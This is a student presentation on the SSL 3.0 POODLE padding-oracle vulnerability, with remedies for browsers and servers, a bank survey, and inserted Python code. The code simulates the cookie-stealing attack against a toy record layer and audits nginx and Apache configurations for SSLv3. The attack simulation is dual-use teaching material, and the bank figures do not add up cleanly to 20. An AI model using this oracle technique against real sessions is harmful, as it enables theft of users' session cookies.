SSL Poodle
Gavriliţă Cristian, Cebanu Ghenadie
Contents
• History
• Vulnerability description
• Example
• Remedies
• Bibliography
History
• "Padding Oracle On Downgraded Legacy Encryption"
• CVE-2014-3566
• September, 2014
• Bodo Möller, Thai Duong, Krzysztof Kotowicz
• Google Security Team
Vulnerability Description
• It is not an implementation vulnerability
• It is a design vulnerability of the SSL 3.0 record layer
• SSLv3 is affected when a CBC-mode cipher suite is negotiated (the attack is a CBC padding oracle)
Attack conditions
• The padding occupies an entire block (encrypted as C_n).
• The first still-unknown byte of the cookie is positioned as the last byte of an earlier block (encrypted as C_j).
Core Point
• SSL 3.0 is defined as ignoring the padding bytes (except the last one, the padding length). These bytes are not covered by the MAC and have no defined value, so the receiver cannot check them.
• TLS 1.0 is not vulnerable to this variant because the protocol requires every padding byte to carry the padding length value, and TLS libraries verify that the padding bytes have the expected values before accepting the record.
CBC encryption
CBC decryption
Practical attack
• The main, and about the only, plausible scenario where these conditions are met is a Web context: the attacker runs a fake WiFi access point and injects some JavaScript of their own into a Web page (HTTP, not HTTPS) that the victim browses. The evil JavaScript makes the browser send requests to an HTTPS site (say, a bank Web site) for which the victim's browser has a cookie. The attacker wants that cookie. Because the attacker is also in the network path, each encrypted record the browser sends can be modified before it reaches the server, and the server's accept/reject reaction can be observed.
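The attack conditions and the "Core Point" above, carried through in code. This is an added simulation, not code from the presentation or from the POODLE paper: a toy SSL 3.0 record layer (MAC-then-pad-then-encrypt in CBC, padding contents unchecked) built on a small HMAC-based Feistel block cipher, which is an assumption chosen so that the example runs offline; the attack itself never touches the cipher and works the same with AES. The attacker's JavaScript is modelled by choosing the prefix and suffix lengths of each request so that the padding fills a whole block and the target cookie byte sits last in block C_j; the attacker then copies C_j over the padding block and watches whether the server accepts. The cookie value and all keys are constructed for the example.

```python
import hmac
import random

BLOCK = 16    # cipher block size, as for the AES-CBC suites in SSL 3.0
MAC_LEN = 20  # SSL 3.0 SHA-1 MAC length

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, rnd, half):
    # Feistel round function, a keyed PRF from HMAC (assumption: stands in for AES)
    return hmac.new(key, bytes([rnd]) + half, "sha256").digest()[:8]

def block_encrypt(key, block):
    lh, rh = block[:8], block[8:]
    for rnd in range(4):
        lh, rh = rh, _xor(lh, _round(key, rnd, rh))
    return lh + rh

def block_decrypt(key, block):
    lh, rh = block[:8], block[8:]
    for rnd in reversed(range(4)):
        lh, rh = _xor(rh, _round(key, rnd, lh)), lh
    return lh + rh

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(prev, pt[i:i + BLOCK]))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, blk), prev))
        prev = blk
    return b"".join(out)

class Ssl3Session:
    """Victim browser and server sharing one toy SSL 3.0 session (constructed)."""

    def __init__(self, cookie, seed=1):
        self.rng = random.Random(seed)
        self.enc_key = bytes(self.rng.randrange(256) for _ in range(32))
        self.mac_key = bytes(self.rng.randrange(256) for _ in range(32))
        self.cookie = cookie  # the secret the attacker is after

    def request(self, prefix_len, suffix_len):
        """Browser side: MAC-then-pad-then-encrypt a request whose prefix and suffix
        lengths the attacker's JavaScript chooses. Padding bytes are random, since
        SSL 3.0 gives them no defined value; each record gets fresh chaining state."""
        data = b"A" * prefix_len + self.cookie + b"B" * suffix_len
        mac = hmac.new(self.mac_key, data, "sha1").digest()
        pad_len = (BLOCK - 1) - (len(data) + MAC_LEN) % BLOCK
        pad = bytes(self.rng.randrange(256) for _ in range(pad_len)) + bytes([pad_len])
        iv = bytes(self.rng.randrange(256) for _ in range(BLOCK))
        return iv, cbc_encrypt(self.enc_key, iv, data + mac + pad)

    def server_accepts(self, iv, ct):
        """Server side: True if the record is accepted, False for bad_record_mac.
        Only the padding-length byte is checked, never the padding contents."""
        pt = cbc_decrypt(self.enc_key, iv, ct)
        pad_len = pt[-1]
        if pad_len >= BLOCK or len(pt) < pad_len + 1 + MAC_LEN:
            return False
        body = pt[:len(pt) - pad_len - 1]
        data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
        return hmac.compare_digest(mac, hmac.new(self.mac_key, data, "sha1").digest())

def poodle_attack(session, cookie_len, max_tries=20000):
    """Recover the cookie one byte at a time. Returns (cookie, requests_sent)."""
    recovered, sent = bytearray(), 0
    for i in range(cookie_len):
        prefix_len = BLOCK - 1 - i % BLOCK        # cookie[i] becomes the last byte of block j
        j = i // BLOCK
        suffix_len = -(prefix_len + cookie_len + MAC_LEN) % BLOCK  # padding fills a whole block
        for _ in range(max_tries):
            sent += 1
            iv, ct = session.request(prefix_len, suffix_len)
            blocks = [ct[k:k + BLOCK] for k in range(0, len(ct), BLOCK)]
            c_prev = iv if j == 0 else blocks[j - 1]
            tampered = b"".join(blocks[:-1]) + blocks[j]  # padding block replaced by C_j
            if session.server_accepts(iv, tampered):
                # accepted only when (P_j XOR C_{j-1} XOR C_{n-2})[-1] == BLOCK - 1
                recovered.append((BLOCK - 1) ^ c_prev[-1] ^ blocks[-2][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; block layout assumption broken")
    return bytes(recovered), sent

if __name__ == "__main__":
    cookie, sent = poodle_attack(Ssl3Session(b"sessionid=7h3P00dle"), 19)
    print(cookie, "recovered with", sent, "requests")
```

Each retry produces a different ciphertext (in real SSL 3.0 because the CBC state chains across records, here because of the fresh IV), so the server accepts the tampered record with probability 1/256 per attempt and each cookie byte costs about 256 requests on average. Changing `server_accepts` to also verify the padding bytes' values, as TLS 1.0 does, makes the oracle go silent and the attack stop working.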
Remedies (Client side)
• Firefox users can type about:config into their address bar and then security.tls.version.min into the search box. This brings up the setting that needs to be changed from 0 to 1.
Remedies (Client side)
• On Chrome you can add the command line flag --ssl-version-min=tls1
Remedies (Client side)
• Fixing up Internet Explorer is also pretty easy. Go to Settings, Internet Options and click on the Advanced tab. Scroll down until you see the Use SSL 3.0 checkbox and uncheck it
Remedies (Server side)
• Nginx
– ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
– sudo nginx -t
– sudo service nginx restart
Remedies (Server side)
• Windows (Schannel, used by IIS): HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols. Under this key, SSL 3.0 is switched off by setting the DWORD value Enabled to 0 in the subkey SSL 3.0\Server (see [6]); a reboot is needed for the change to take effect.
Remedies (Server side)
• Apache
– SSLProtocol All -SSLv2 -SSLv3
– apachectl configtest
– sudo service apache2 restart
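A configuration check for the nginx and Apache remedies above, added here as an example and not part of the presentation. It evaluates the `ssl_protocols` list and the mod_ssl `SSLProtocol` modifiers (`all`, `+X`, `-X`, bare names) the way the servers do, and flags any file that still ends up with SSLv3 enabled. The configuration fragments are constructed: the weak setting next to the fix given in the slides, plus an Apache line where `+SSLv3` re-enables the protocol after a restrictive list. A missing directive is treated as not hardened, since the build's default then decides.

```python
import re

# Protocols selected by mod_ssl's "all" shortcut; older builds also count SSLv2,
# so it is included conservatively
APACHE_ALL = {"sslv2", "sslv3", "tlsv1", "tlsv1.1", "tlsv1.2"}

def nginx_allows_sslv3(config):
    """True if any ssl_protocols directive lists SSLv3, or if none is present."""
    directives = re.findall(r"^\s*ssl_protocols\s+([^;]+);", config, re.M)
    if not directives:
        return True  # default of the build applies; not explicitly hardened
    return any("SSLv3" in d.split() for d in directives)

def apache_allows_sslv3(config):
    """Apply mod_ssl SSLProtocol semantics line by line: 'all' selects every
    protocol, '+X' adds, '-X' removes, a bare name selects it. True if any
    SSLProtocol line ends with SSLv3 enabled, or if none is present."""
    directives = re.findall(r"^\s*SSLProtocol\s+(.+?)\s*$", config, re.M | re.I)
    if not directives:
        return True
    for line in directives:
        enabled = set()
        for tok in line.lower().split():
            if tok == "all":
                enabled |= APACHE_ALL
            elif tok.startswith("+"):
                enabled.add(tok[1:])
            elif tok.startswith("-"):
                enabled.discard(tok[1:])
            else:
                enabled.add(tok)
        if "sslv3" in enabled:
            return True
    return False

# Constructed fragments: the weak setting beside the fix from the slides
SAMPLE_CONFIGS = {
    "nginx-weak": "server {\n    listen 443 ssl;\n    ssl_protocols SSLv3 TLSv1 TLSv1.1 TLSv1.2;\n}\n",
    "nginx-fixed": "server {\n    listen 443 ssl;\n    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;\n}\n",
    "apache-weak": "SSLEngine on\nSSLProtocol all -SSLv2\n",
    "apache-fixed": "SSLEngine on\nSSLProtocol All -SSLv2 -SSLv3\n",
    "apache-sneaky": "SSLEngine on\nSSLProtocol TLSv1.2 +SSLv3\n",
}

def audit(configs=SAMPLE_CONFIGS):
    """Map each config name to True when it still allows SSLv3."""
    return {
        name: (nginx_allows_sslv3(text) if name.startswith("nginx") else apache_allows_sslv3(text))
        for name, text in configs.items()
    }

if __name__ == "__main__":
    for name, allows in audit().items():
        print(f"{name:14s} {'SSLv3 ENABLED' if allows else 'ok'}")
```

The check only reads configuration; it does not replace an external test of the live listener, which is what the SSL Labs scan described later on this page performs. It is also intentionally strict about a missing directive, so a file that relies on defaults is reported rather than silently passed.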
TLS_FALLBACK_SCSV
• TLS_FALLBACK_SCSV is a signalling cipher suite value that a client includes in its ClientHello when it retries a handshake with a lower protocol version than its maximum (the "downgrade dance" browsers perform after a failed handshake).
• A server that supports TLS_FALLBACK_SCSV and a higher version than the one offered rejects the connection with an inappropriate_fallback alert, so an attacker cannot force an SSLv3 connection between two parties that both speak TLS. It does not help when SSLv3 is the best version one side supports.
SSL3 protocol check in TOP 20 banks
• 2 Weeks after announcement of SSL Poodle vulnerability
• Tested with http://www.ssllabs.com/
• Of the 20 analyzed banks:
– 15 had not disabled SSL3;
– 2 supported only SSL3;
– 3 had disabled SSL3 completely;
– 2 had disabled SSL3 only for the individual (retail) customer portal;
www.info.uaic.ro
Conclusions
• SSLv3: a tampered record is accepted with probability 1/256 (2^-8), so one byte of the cookie is recovered per 256 requests on average.
• TLS 1.0: every padding byte must hold the right value, so a random guess succeeds with probability 2^-64 (1/18446744073709551616) for an 8-byte block, which is not practical.
Bibliography
• [1] This POODLE Bites: Exploiting the SSL 3.0 Fallback, Bodo Möller, Thai Duong, Krzysztof Kotowicz, Google, September 2014
• [2] SSL v3 goes to the dogs - POODLE kills off protocol, https://scotthelme.co.uk/sslv3-goes-to-the-dogs-poodle-kills-off-protocol/
• [3] http://security.stackexchange.com/questions/70719/ssl3-poodle-vulnerability
• [4] http://habrahabr.ru/company/mailru/blog/241113/
• [5] http://habrahabr.ru/company/first/blog/242493/
• [6] https://support.microsoft.com/kb/187498/en-us